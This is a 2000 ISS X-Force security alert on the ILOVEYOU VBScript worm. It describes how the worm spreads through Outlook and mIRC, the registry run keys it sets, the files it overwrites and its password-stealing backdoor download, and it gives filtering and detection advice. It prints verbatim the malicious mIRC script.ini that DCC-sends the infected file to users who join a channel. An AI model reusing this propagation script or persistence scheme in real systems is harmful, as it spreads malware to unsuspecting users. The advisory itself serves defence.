TO UNSUBSCRIBE: email "unsubscribe alert" in the body of your message to majordomo@iss.net Contact alert-owner@iss.net for help with any problems! --------------------------------------------------------------------------- -----BEGIN PGP SIGNED MESSAGE----- Internet Security Systems Security Alert May 4, 2000 "ILOVEYOU" Virus Affects Windows Users Synopsis: A dangerous Visual Basic Script (VBScript) virus, dubbed the "LoveLetter" or "ILOVEYOU" virus, has been spreading itself across the Internet through email via Microsoft Outlook and through Internet Relay Chat (IRC) using a popular IRC client named mIRC. The virus is susceptible to activation whenever the Windows Script Host features are enabled. Impact: Mail servers may incur mild to severe overloading and could crash when flooded with an unexpected number of the ILOVEYOU messages. The actual VBScript code performs a number of destructive tasks: - - modifies and creates various Windows registry entries - - launches Internet Explorer to download a backdoor program which, once installed, captures network passwords and emails this data to an account in the Philippines - - infects the local machine by creating many new copies of itself and overwriting data files of specific file types (including VBScript, JavaScript, JPEG, and MP2/MP3) - - spreads itself to other users by using information from the Microsoft Outlook Address Book, as well as mIRC's DCC feature, which allows chat participants to exchange files Description: Visual Basic Scripts can be executed if Windows Script Host (WSH) is installed and enabled. Windows Script Host is installed by default with Windows 98 and with Internet Explorer version 4.0 and later. The message is very identifiable. The subject is always "ILOVEYOU", and the body of the email only contains the message "kindly check the attached LOVELETTER coming from me." The email contains a single instance of the virus in the form of an attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs". When the attachment is opened, the malicious VBScript code launches, performing the following operations in sequence: - - The virus removes the timeout associated with the Windows scripting unit by changing the value of the HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout registry key. - - The virus copies itself to SYSTEMDIR\MSKernel32.vbs, WINDIR\Win32DLL.vbs, and SYSTEMDIR\LOVE-LETTER-FOR-YOU.TXT.vbs. - - The following registry entries are created under HKEY_LOCAL_MACHINE, such that the MSKernel32.vbs and Win32DLL.vbs copies will be launched at boot-time: \Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 \Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL Win32DLL.vbs is created as a service. - - An HTML file named LOVE-LETTER-FOR-YOU.HTM is created for later use (in the mIRC script) and placed in the Windows SYSTEMDIR. Typically, WINDIR is C:\WINDOWS and SYSTEMDIR is C:\WINDOWS\SYSTEM. - - The virus attempts to spread itself via e-mail using Microsoft Outlook. It sends a message to all addresses found in every address book. Each individual is flagged in the registry after they have been sent a copy. For each address list that is found, a counter is kept in the registry to track the number of users that have been mailed. The number of email addresses in the address list is also recorded. If the number of addresses in the list increases, the virus will enumerate the individuals again and send out the "ILOVEYOU" mail to those who have not previously received it. All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB. - - The virus uses Internet Explorer to connect one of four HTTP web locations in an attempt to download a backdoor program called WIN-BUGSFIX.EXE. This backdoor program captures any network passwords it identifies and automatically emails this information to a mail account in the Philippines, presumably controlled by the author of the virus. Before Internet Explorer is launched, the following registry entry, which sets the Internet Explorer start page, is changed to one of four URLs at random: \Software\Microsoft\Internet Explorer\Main\Start Page After the executable is downloaded, the start page value is set to "about:blank". - - The following registry entry is created (under HKEY_LOCAL_MACHINE) to launch WIN-BUGSFIX.EXE at boot-time: \Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE - - The virus identifies any "Fixed" or "Removable" drives connected to the system and recursively visits each folder, overwriting files of any of the following extensions with a copy of itself, changing the extension to ".vbs" and deleting the original file: vbs - Visual Basic Script vbe - Visual Basic Script (Encoded) js - JavaScript jse - JavaScript (Encoded) css - Cascading Style Sheets wsh - Windows Script Host sct - Scriptlet file hta - HTML Application The virus deletes any .jpg and .jpeg compressed image files, and replaces by a copy of the virus with ".vbs" appended to the end of the original file name. Original copies of any MP3 or MP2 audio files found are preserved, but a copy of the virus is created using the same file name with ".vbs" appended. The original MP2/MP3 file's attributes will be changed so the file is hidden. - - If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini", "script.ini", or "mirc.hlp" are found, a new default initialization script named "script.ini" is created in the same directory: [script] ;mIRC Script ; Please dont edit this script... mIRC will corrupt, if mIRC will ; corrupt... WINDOWS will affect and will not run correctly. thanks ; ;Khaled Mardam-Bey ;http://www.mirc.com ; n0=on 1:JOIN:#:{ n1= /if ( $nick == $me ) { halt } n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" n3=} This script will attempt to send a copy of the pre-generated HTML page to any user who is seen joining any channel you are in on IRC. Recommendations: Everyone should obtain and install the latest virus definition files for their virus scanning software. Mail administrators should filter out any email that has a .VBS attachment, or at least any mail with a subject line of "ILOVEYOU". ISS RealSecure can be configured to detect the ILOVEYOU virus by creating a new User Defined Event. Set the priority to HIGH, and the context to Email_Content. Set the search string to "kindly check the attached LOVELETTER coming from me". Select the actions to RSKILL, and any additional action you would like. This should stop any incoming email containing the virus from being delivered to an SMTP server. Trend Micro's instructions for removing the virus from your system can be found at http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER. Additional Information: For more information on the ILOVEYOU virus, visit the following web sites: http://europe.datafellows.com/v-descs/love.htm http://vil.mcafee.com/dispVirus.asp?virus_k=98617 http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER _______ About Internet Security Systems (ISS) Internet Security Systems (ISS) is a leading global provider of security management solutions for the Internet. By providing industry-leading SAFEsuite security software, remote managed security services, and strategic consulting and education offerings, ISS is a trusted security provider to its customers, protecting digital assets and ensuring safe and uninterrupted e-business. ISS' security management solutions protect more than 5,500 customers worldwide including 21 of the 25 largest U.S. commercial banks, 10 of the largest telecommunications companies and over 35 government agencies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe, Latin America and the Middle East. For more information, visit the Internet Security Systems web site at www.iss.net or call 888-901-7477. Copyright (c) 2000 by Internet Security Systems, Inc. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well as on MIT's PGP key server and PGP.com's key server. Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv iQCVAwUBORICGjRfJiV99eG9AQGimAQAoGWXxsq3j1A3/12dHqh24rx+1NvM018t lyP+l4nhWbrBN6sIsB5oTtenuWOtlXVewOnfrts9LuhkS5FRK3UcUU9pyuejC7TW 4i1RtFCHOFyJmbbsYKgHYrLIsZGblfVGWDCtyXYbAMoLcyOxPSPSzzwaH4t+Xx+i otjmEIV8wno= =9Ahv -----END PGP SIGNATURE-----